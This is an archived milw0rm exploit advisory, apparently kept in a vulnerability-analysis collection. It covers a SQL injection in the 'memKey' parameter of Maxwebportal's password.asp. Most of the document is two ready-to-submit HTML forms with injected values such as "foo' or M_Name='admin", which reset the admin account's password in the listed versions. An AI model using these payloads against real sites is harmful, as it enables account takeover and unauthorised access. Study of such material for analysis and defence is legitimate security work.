lilbool/vuln-code-analysis
0
1<!--
2Hi, I'm Soroush Dalili from Grayhatz Security Group (GSG) . I found dangerous sql injection
3in Maxwebportal version 1.35,1.36,2.0, 20050418 Next
4Remote user can inject his/her code in "memKey" var. and change other users password in
5password.asp
6
7Exploit codes to proof:
8-->
9
10-----------------Code Start-----Version 1.35 and older--------------
11<form action="http://[URL]/password.asp?mode=reset" method="post">
12<br>
13pass1: <input name="pass" type="text" value="123456" size="150"><br>
14pass2: <input name="pass2" type="text" value="123456" size="150"><br>
15Id: <input name="memId" type="text" value="-1" size="150"><br>
16Member Key: <input name="memKey" type="text" value="foo' or M_Name='admin" size="150">
17<br>
18<input name="Submit" type="submit" value="Submit">
19</form>
20-----------------End-------------------
21
22Version 1.36, 2.0, 20050418 Next:
23
24-----------------Code Start-----Version 1.36, 2.0, 20050418 Next--------------
25<form action="http://[URL]/password.asp?mode=reset" method="post">
26<br>
27pass1: <input name="pass" type="text" value="123456" size="150"><br>
28pass2: <input name="pass2" type="text" value="123456" size="150"><br>
29Id: <input name="memId" type="text" value="-1" size="150"><br>
30Member Key: <input name="memKey" type="text" value="foo') or M_Name='admin' or ('1'='2"
31
32size="150">
33<br>
34<input name="Submit" type="submit" value="Submit">
35</form>
36-----------------End-------------------
37
38# milw0rm.com [2005-05-26]